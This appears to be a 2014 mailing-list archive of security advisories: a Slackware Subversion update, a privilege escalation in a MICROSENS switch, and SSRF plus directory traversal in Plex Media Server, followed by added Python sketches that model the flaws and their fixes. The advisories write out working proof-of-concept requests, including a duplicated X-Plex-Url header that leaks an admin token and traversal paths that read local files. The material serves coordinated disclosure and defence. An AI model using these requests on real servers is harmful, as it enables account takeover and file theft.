[slackware-security] subversion (SSA:2014-058-01)

2014-02-28 Thread Slackware Security Team


New subversion packages are available for Slackware 14.0, 14.1, and -current to
fix denial-of-service issues.


Here are the details from the Slackware 14.1 ChangeLog:
+--+
patches/packages/subversion-1.7.16-i486-1_slack14.1.txz:  Upgraded.
  Fix denial of service bugs.
  For more information, see:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4505
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4558
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0032
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the Get Slack section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/subversion-1.7.16-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/subversion-1.7.16-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/subversion-1.7.16-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/subversion-1.7.16-x86_64-1_slack14.1.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/subversion-1.7.16-i486-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/subversion-1.7.16-x86_64-1.txz


MD5 signatures:
+-+


Installation instructions:
++

Upgrade the package as root:
# upgradepkg subversion-1.7.16-i486-1_slack14.1.txz


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com



SEC Consult SA-20140228-0 :: Privilege escalation vulnerability in MICROSENS Profi Line Modular Industrial Switch

2014-02-28 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20140228-0 >
===
  title: Privilege escalation vulnerability
product: MICROSENS Profi Line Modular Industrial Switch Web
 Manager (MS652119PM)
 vulnerable version: Firmware version 10.3.1
  fixed version: Firmware version 10.3.2
 impact: High
   homepage: http://www.microsens.com/profi-line-modular/
  found: 2013-08-21
 by: Christian Kudera, Stefan Riegler
 SEC Consult Vulnerability Lab
 https://www.sec-consult.com 
===

Vendor description:
---
The new Profi Line Modular switches, from MICROSENS, offer maximum
performance and flexibility in smallest spaces. Robust, modular, expandable
and designed for greatest reliability and shortest recovery times, the Profi
Line Modular series has become the first-choice solution for Industrial
Ethernet.

Source: http://www.microsens.com/profi-line-modular/


Business recommendation:
---
SEC Consult has identified a privilege escalation in the MICROSENS Web Manager
in the course of a very limited infrastructure audit. Very little time was
spent on the affected product.

The Web Manager can be used with read only permission to check the
configuration on the device (e.g. VLANs, Port status). Additionally the Web
Manager can be used with read and write permission to configure the device.

Using the identified vulnerability a low privileged user having read only
permission can elevate his privileges to contain read and write permissions.


Vulnerability overview/description:
---
The Web Manager contains a login form to authenticate a user. The Web Manager
offers different levels of privilege (e.g. read only permission, read and
write permission, debugging permission).

The login attempt is checked through a CGI binary, but the response of the
binary is validated at the client side via JavaScript. An attacker can
intercept and modify the response of the binary, thus achieving authentication
and the desired level of authorization.  No further validation is performed by
the Web Manager.


Proof of concept:
-
The login generates the following request to the server:
interf=WEB&bidx=1&unam=root&pawo=&plev=0

This request triggers a CGI binary, which validates the login attempt and
returns the following response:
<xml>
  <!-- last change: 17.04.2012 -->
  <!-- returned at uptime of 141056 seconds -->
  <header>
    <version>V0.1</version>
    <user>XYZ</user>
    <date>2012/05/29 17:28:00</date>
  </header>

  <response>
    <par name="cmd" type="STRING">
      <val>login</val>
    </par>
    <par name="result" type="UNSIGNED">
      <val>255</val>
    </par>
    <par name="lunam" type="STRING">
      <val>root</val>
    </par>
    <par name="liid" type="STRING">
      <val>0</val>
    </par>
    <par name="rhost" type="STRING">
      <val>192.10.100.136</val>
    </par>
    <par name="a_s_b" type="STRING">
      <val>0_0_1</val>
    </par>
  </response>
</xml>

The parameter result informs the client about the properness of the provided
login credentials.
The parameter can correspond to the following values:
255   login failed
1 login with read only permission
2 login with read and write permission
3 login with debugging permission

For example, if the value of the parameter result is changed to 3, the user
gets logged in with debugging permissions.


Vendor contact timeline:
---
2013-09-10: Contacting vendor
2013-09-11: Sending advisory and proof of concept exploit via encrypted
channel.
2013-09-11: Vendor acknowledges receipt of advisory.
2013-10-18: Vendor responds and wants to release update on 2013-10-31.
2013-10-31: MICROSENS releases fixed version.
2014-02-07: Conference call: Clarifying pending questions regarding the fixed
version.
2014-02-28: SEC Consult releases coordinated security advisory.


Solution:
-
Update to the most recent firmware version 10.3.2


Workaround:
---
All accounts with read only permissions should be disabled on the device.


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested in working with the experts of SEC Consult?
Write to car...@sec-consult.com
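The advisory above describes a Web Manager that lets client-side JavaScript decide the privilege level from the CGI response. The following Python sketch, added here and not taken from the advisory or from MICROSENS, parses the documented response format and shows the server-side pattern that closes the hole: the privilege level is recorded in a server-held session at login and every later check reads that record, so a client-supplied level (the plev field or an edited result value) has no effect. The SessionStore class and the sample response are constructed for illustration.

```python
import secrets
import xml.etree.ElementTree as ET

# Result codes documented in the advisory and the privilege each denotes.
RESULT_TO_LEVEL = {255: None, 1: "read-only", 2: "read-write", 3: "debug"}
RANK = {"read-only": 1, "read-write": 2, "debug": 3}

# Constructed sample of the CGI login response (header block omitted).
SAMPLE_RESPONSE = """<xml>
  <response>
    <par name="cmd" type="STRING"><val>login</val></par>
    <par name="result" type="UNSIGNED"><val>1</val></par>
    <par name="lunam" type="STRING"><val>root</val></par>
  </response>
</xml>"""


def parse_login_result(xml_text):
    """Extract the integer 'result' parameter from the CGI response."""
    root = ET.fromstring(xml_text)
    for par in root.iter("par"):
        if par.get("name") == "result":
            return int(par.findtext("val"))
    raise ValueError("response carries no result parameter")


class SessionStore:
    """Hypothetical server-side record of who logged in at which level."""

    def __init__(self):
        self._levels = {}

    def login(self, cgi_response):
        """Evaluate the CGI verdict on the server and bind it to an opaque token."""
        level = RESULT_TO_LEVEL.get(parse_login_result(cgi_response))
        if level is None:
            return None                    # 255 or unknown code: no session
        token = secrets.token_hex(16)      # unguessable handle for the client
        self._levels[token] = level
        return token

    def authorize(self, token, required, client_claimed_level=None):
        """Decide from the stored level only; client_claimed_level (a plev
        field, a JavaScript flag, a rewritten result) is deliberately ignored."""
        level = self._levels.get(token)
        return level is not None and RANK[level] >= RANK[required]
```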

SEC Consult SA-20140228-1 :: Authentication bypass (SSRF) and local file disclosure in Plex Media Server

2014-02-28 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20140228-1 >
===
  title: Authentication bypass (SSRF) and local file disclosure 
product: Plex Media Server
 vulnerable version: <=0.9.9.2.374-aa23a69
  fixed version: >=0.9.9.3
 impact: Critical
   homepage: http://www.plex.tv
  found: 2014-02-06
 by: Stefan Viehböck
 SEC Consult Vulnerability Lab
 https://www.sec-consult.com
===

Vendor/product description:
-
Plex is a media player system consisting of a player application with a
10-foot user interface and an associated media server. It is available for
Mac OS X, Linux, and Microsoft Windows.

URL: https://en.wikipedia.org/wiki/Plex_(software)


Vulnerability overview/description:
---
1. Authentication bypass / Server Side Request Forgery (SSRF)
The Plex Media Server /system/proxy functionality fails to properly validate
pre-authentication user requests. This allows unauthenticated attackers to make
the Plex Media Server execute arbitrary HTTP requests.

By requesting content from 127.0.0.1 an attacker can bypass all authentication
and execute commands with administrative privileges.

2. Unauthenticated local file disclosure
Because of insufficient input validation, arbitrary local files can be
disclosed. Files that include passwords and other sensitive information can
be accessed.


Plex Remote servers (thousands of them can be found via Shodan and Google,
none of them were accessed) are affected by both vulnerabilities as well.


Proof of concept:
-
1. Authentication bypass / Server Side Request Forgery (SSRF)
The following GET request bypasses the webserver whitelist. 

GET /system/proxy HTTP/1.1
Host: PLEX_WAN_HOST
X-Plex-Url: http://localhost:32400/myplex/account?IRRELEVANT=
X-Plex-Url: http://my.plexapp.com/


The last X-Plex-Url header value "http://my.plexapp.com/" is contained in
the whitelist (Regex) and passes validation. The request is then processed by
the actual request handler in the backend webserver (Python). Here both header
values are concatenated using a comma. This way the actual URL that is
requested is controlled by the first X-Plex-Url value.
By indicating a parameter (called IRRELEVANT) the second X-Plex-Url value is
dissolved.

This results in the following request (made by Plex Media Server):

GET /myplex/account?IRRELEVANT=,http://my.plexapp.com/ HTTP/1.1
Host: localhost:32400
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) 
Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Connection: close
Accept: */*
Accept-Encoding: gzip


The response for this request is passed to the attacker and includes the
authToken value (master token), which can be used to impersonate legitimate
Plex users. Of course other administrative actions can be performed as well.

<?xml version="1.0" encoding="UTF-8"?>
<MyPlex authToken="REMOVED" username="REMOVED" mappingState="mapped"
mappingError="" mappingErrorMessage="1" signInState="ok" publicAddress="1"
publicPort="9415" privateAddress="1" privatePort="32400"
subscriptionFeatures="cloudsync,pass,sync" subscriptionActive="1"
subscriptionState="Active">
</MyPlex>


A video demonstrating this issue has been released by SEC Consult:
http://www.youtube.com/watch?v=f99fm4QU9u8


2. Unauthenticated local file disclosure
The following requests show different functionality that is vulnerable to
directory traversal:

GET /manage/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: HOST

GET /web/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: HOST

GET /:/resources/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: HOST

The /manage/ and /web/ handlers can be exploited without prior authentication.
This vulnerability was confirmed on Windows.



Vulnerable / tested versions:
-
The vulnerabilities have been verified to exist in Plex Media Server version
0.9.9.2.374-aa23a69.


Vendor contact timeline:
---
2014-02-09: Contacting vendor through e...@plexapp.com and requesting
encryption keys.
2014-02-10: Vendor provides encryption keys.
2014-02-10: Sending advisory and proof of concept exploit.
2014-02-10: Vendor acknowledges receipt of advisory.
2014-02-17: Requesting status update.
2014-02-17: Vendor provides release timeline.
2014-02-20: Vendor releases fixed version (0.9.9.3).
2014-02-21: Requesting clarification regarding fixed version.
2014-02-21: Vendor provides further information about fixed version and
other reported vulnerabilities.
2014-02-28: SEC Consult releases coordinated security advisory.


Solution:
-
Update to a more recent version of Plex Media Server (e.g. 0.9.9.5).


Workaround:
---
No workaround available.


Advisory URL
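The SSRF above hinges on two details: the whitelist regex is applied to one X-Plex-Url header value while the fetch uses all values joined with a comma, so the string that was checked is not the string that is requested. The Python below, added here and not Plex's code, models that mismatch with a constructed allowlist regex and the header list from the advisory, and sets a hardened resolver beside it that refuses duplicate headers, parses the URL once, validates the parsed host, and returns exactly that parsed URL for fetching.

```python
import re
from urllib.parse import urlsplit

# Constructed allowlist standing in for the proxy's whitelist regex (assumption).
ALLOWED_RE = re.compile(r"^https?://my\.plexapp\.com/")
ALLOWED_HOSTS = {"my.plexapp.com"}

# The request from the advisory as a constructed header list, order preserved.
BYPASS_HEADERS = [
    ("Host", "PLEX_WAN_HOST"),
    ("X-Plex-Url", "http://localhost:32400/myplex/account?IRRELEVANT="),
    ("X-Plex-Url", "http://my.plexapp.com/"),
]


def header_values(headers, name):
    """All values for a header name, in the order they appeared."""
    return [v for k, v in headers if k.lower() == name.lower()]


def vulnerable_target(headers):
    """Check the last header value against the regex, then fetch the
    comma-joined string: the checked value and the fetched value differ."""
    values = header_values(headers, "X-Plex-Url")
    if not values or not ALLOWED_RE.match(values[-1]):
        return None
    return ",".join(values)


def hardened_target(headers):
    """Exactly one header, parsed once; validate the parsed host, scheme and
    authority, and hand back the same parsed URL so check and fetch agree."""
    values = header_values(headers, "X-Plex-Url")
    if len(values) != 1:
        return None                        # duplicates are ambiguous: refuse
    parts = urlsplit(values[0])
    if parts.scheme not in ("http", "https"):
        return None
    if parts.hostname not in ALLOWED_HOSTS or parts.username is not None:
        return None                        # also rejects user@host tricks
    return parts.geturl()


def fetched_host(url):
    """Host an HTTP client would actually connect to for this URL string."""
    return urlsplit(url).hostname
```

Running `fetched_host(vulnerable_target(BYPASS_HEADERS))` returns `localhost`, which is the loopback request the advisory shows the server making.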